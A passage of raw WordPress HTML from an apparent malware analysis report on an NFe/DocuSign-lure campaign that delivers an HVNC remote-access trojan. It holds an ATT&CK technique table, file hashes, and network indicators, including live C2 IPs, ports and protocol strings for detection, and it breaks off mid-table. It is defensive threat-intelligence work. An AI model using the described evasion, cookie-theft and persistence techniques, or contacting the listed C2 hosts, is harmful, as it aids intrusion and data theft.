                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Reconnaissance                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        T1592 (env. fingerprint, page-level)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Gather Victim Host Information                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Lure page's silent telemetry beacon (UA, resolution, timezone) sent before payload release                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Initial Access                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        T1566.002                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Phishing: Spearphishing Link                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Fake DocuSign / NFe delivery-notice page as the entry vector                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        T1027                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Obfuscated Files or Information                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D4"
                    data-col-index="3"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        ZIP-in-disguise, MIME override, nested single-byte XOR string obfuscation with context-specific keys                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        T1036.005                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Masquerading: Match Legitimate Name or Location                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D5"
                    data-col-index="3"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        LNK icon spoofed to notepad.exe; UpdateAssistant.exe VersionInfo claims Microsoft Corporation while unsigned; DLL bundle mimics a real software installer                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        T1622 / anti-automation (no direct ATT&CK ID)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Debugger/Environment Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D6"
                    data-col-index="3"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        navigator.webdriver / headless-browser checks; human-interaction gating before payload release                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        T1518.001                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Security Software Discovery                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D7"
                    data-col-index="3"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        20+ hardcoded AV/EDR process names, checked via Toolhelp32 snapshot                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Execution                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        T1204.002                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        User Execution: Malicious File                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D8"
                    data-col-index="3"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Victim double-clicks the disguised .lnk                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Execution                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        T1059.001                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Scripting Interpreter: PowerShell                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D9"
                    data-col-index="3"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Hidden, execution-policy-bypassed PowerShell one-liner                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Control                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        T1105                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Ingress Tool Transfer                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D10"
                    data-col-index="3"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        PowerShell Invoke-WebRequest pulling the NSIS loader from the Azure staging host                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Control                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        T1573 (custom config, not full-channel encryption)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Encrypted/Obfuscated Configuration                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D11"
                    data-col-index="3"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        XOR-protected C2 host string embedded in the final payload                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Control                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        T1571                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Non-Standard Port                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D12"
                    data-col-index="3"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Raw TCP C2 on port 27015 (Source-engine game port), not HTTP/HTTPS                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A13"
                    data-col-index="0"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Control                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B13"
                    data-col-index="1"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        T1095                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C13"
                    data-col-index="2"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Non-Application Layer Protocol                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D13"
                    data-col-index="3"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Custom raw-TCP protocol rather than HTTP/WebSocket                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A14"
                    data-col-index="0"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        Collection                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B14"
                    data-col-index="1"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        T1113                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C14"
                    data-col-index="2"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        Screen Capture                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D14"
                    data-col-index="3"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        GDI BitBlt/GetDIBits + OpenCV-backed frame queue                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A15"
                    data-col-index="0"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        Collection                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B15"
                    data-col-index="1"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        T1056.001                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C15"
                    data-col-index="2"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        Input Capture: Keylogging                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D15"
                    data-col-index="3"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        GetAsyncKeyState/GetKeyboardState polling imports                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A16"
                    data-col-index="0"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        Collection                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B16"
                    data-col-index="1"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        T1539                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C16"
                    data-col-index="2"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        Steal Web Session Cookie                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D16"
                    data-col-index="3"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        Hardcoded targeting of Firefox cookies.sqlite                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A17"
                    data-col-index="0"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        Collection                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B17"
                    data-col-index="1"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        T1217                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C17"
                    data-col-index="2"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        Browser Information Discovery                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D17"
                    data-col-index="3"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        Hardcoded targeting of Firefox places.sqlite / permissions.sqlite                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A18"
                    data-col-index="0"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Control / Impact                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B18"
                    data-col-index="1"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        T1219 (closest analogue)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C18"
                    data-col-index="2"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        Remote Access Software (custom HVNC)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D18"
                    data-col-index="3"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        Hidden-desktop + SendInput architecture functioning as an unauthorized remote-access channel                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A19"
                    data-col-index="0"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B19"
                    data-col-index="1"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        T1547.001                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C19"
                    data-col-index="2"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        Boot or Logon Autostart Execution: Startup Folder                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D19"
                    data-col-index="3"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        AppUpdateHelper.lnk dropped into the current user's Start Menu \ Programs \ Startup folder, pointing to a self-relocated payload copy (confirmed dynamically, Section 8.5.3)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A20"
                    data-col-index="0"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B20"
                    data-col-index="1"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        T1036.005 (persistence-stage recurrence)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C20"
                    data-col-index="2"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        Masquerading: Match Legitimate Name or Location                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D20"
                    data-col-index="3"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        Relocated persistence copy renamed to AppUpdateHelper.exe, matching the mutex-name convention                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-375'>
table#wpdtSimpleTable-375{ table-layout: fixed !important; }
table#wpdtSimpleTable-375 td, table.wpdtSimpleTable375 th { white-space: normal !important; }
</style>




<h2 class="wp-block-heading">Indicators of Compromise</h2>



<p class="wp-block-paragraph">File Hashes:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-376"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="11"
           data-wpID="376"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Stage                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Filename                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        SHA-256                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        2 - ZIP dropper (build 1, Samsung decoy)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        DANFE_SAMSUNG_ELET_AM_CNPJ...zip / .nfe                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        e4d637f884f5babea6525266e1cb6ab332a16a446d6084dd51b4222540c1f16c                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        2 - ZIP dropper (build 2, Motorola decoy)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        MOTOROLA_MOB_COM_NFe_2026-07-16_217816240.zip                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        97f35ba586fc121590c867b4d6707777fbeca2ace5ad077807ec806540bb47cd                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        2 - LNK dropper (build 2, in-archive)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        NF_Eletronica999147237654.lnk                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Not independently hashed - identified via ZIP CRC32 0x3F6F7598 (compressed 1,059 B / uncompressed 2,752 B)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        4 - Final payload (build 1, statically analyzed)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        UpdateAssistant.exe                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        5fbfc7929858c3c3d79637db857525695db3c0f41b9bf2a7b964c26b7226bde3                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        4 - Final payload (build 2, dynamically captured)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        UpdateAssistant.exe / AppUpdateHelper.exe (post-persistence copy)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        debf48e690abd4288e5f76fa7e9f98a9fb3411171eba82906ef0d2bf1ef2dd6d                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        4 - Persistence shortcut (build 2)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        AppUpdateHelper.lnk                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        25db85830d86cafbb93a660242f8b4017273cc4612e94dd7a8af29c948651bbe                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        3 - Cover DLL: vcruntime140.dll (build 2, relocated copy)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        vcruntime140.dll                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        d1f4225df2cd877dbf130d5668a021dce3f94118455ff5ec952061c30afc9ce7                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        3 - Cover DLL: vcruntime140_1.dll (build 2, relocated copy)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        vcruntime140_1.dll                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        1f2d41c4aa5db0bc33ebf7b66d72943a817d7ce6cbe880502a9403823633093f                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        3 - Cover DLL: concrt140.dll (build 2, relocated copy)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        concrt140.dll                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        54716f0738af891f283d213b5c8d11b25896bb8ee3097d301eae718560cf974e                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        3 - Cover DLL: msvcp140.dll (build 2, relocated copy)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        msvcp140.dll                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        7c26614e1d733892c2deac7e245ce115504b1d80592dd0a01b08e3e5a55f89ca                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-376'>
table#wpdtSimpleTable-376{ table-layout: fixed !important; }
table#wpdtSimpleTable-376 td, table.wpdtSimpleTable376 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">Network Indicators:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-379"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="4"
           data-rows="15"
           data-wpID="379"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Indicator                    </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Type                    </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Role                    </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Confidence                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        40.124.169.27                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        IPv4                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Stage-2 payload staging (Azure)                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        5.230.249.49:27015 / :27017                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        IPv4:Port                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Live C2 endpoint (raw TCP/HVNC beacon) — port confirmed to vary by build (27015 statically decoded, 27017 live-observed)                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        VERSION:1.2.0.4.71                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        C2 protocol content string                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Internal build/family version reported in the plaintext HVNC check-in banner — infrastructure-independent detection signature (Section 10.2.1)                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D4"
                    data-col-index="3"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        "HVNC-" / "CLIENT_ID:HVNC-" / "IDENTIFIER_CHANNEL:"                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        C2 protocol content strings                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Structural protocol markers suitable for network-content (Suricata) detection independent of C2 IP/port rotation                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D5"
                    data-col-index="3"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        5.230.249.49 (port 80/443)                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        IPv4                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Also observed serving stage-2 payloads directly (see dl.php entries below) — not staging-only                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D6"
                    data-col-index="3"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        5.230.54.41                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        IPv4                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
